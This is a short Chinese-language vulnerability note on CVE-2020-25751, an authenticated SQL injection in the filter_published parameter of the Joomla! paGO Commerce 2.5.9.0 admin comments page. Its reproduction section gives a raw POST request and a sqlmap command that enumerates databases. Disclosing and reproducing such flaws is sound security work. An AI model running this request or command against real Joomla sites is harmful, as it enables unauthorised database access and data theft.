（CVE-2020-25751）Joomla! paGO Commerce 2.5.9.0 sql注入漏洞

一、漏洞简介

Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。

Joomla! paGO Commerce 插件 2.5.9.0版本存在sql注入漏洞。该漏洞源于administrator/index.php?option=com_pago＆view=comments filter_published 参数。攻击者可利用该漏洞执行非法SQL命令。

二、漏洞影响

Joomla! paGO Commerce 2.5.9.0

三、复现过程

POST /joomla/administrator/index.php HTTP/1.1
Host: www.0-sec.org:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Origin: http://localhost
Connection: close
Referer: http://www.0-sec.org/joomla/administrator/index.php?option=com_pago&view=comments
Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
Upgrade-Insecure-Requests: 1

filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1

sqlmap poc:

sqlmap -r www.0-sec.org --dbs --risk=3 --level=5 --random-agent -p filter_published

参考链接

https://www.nmmapper.com/st/exploitdetails/48811/43057/joomla-pago-commerce-2590-sql-injection-authenticated/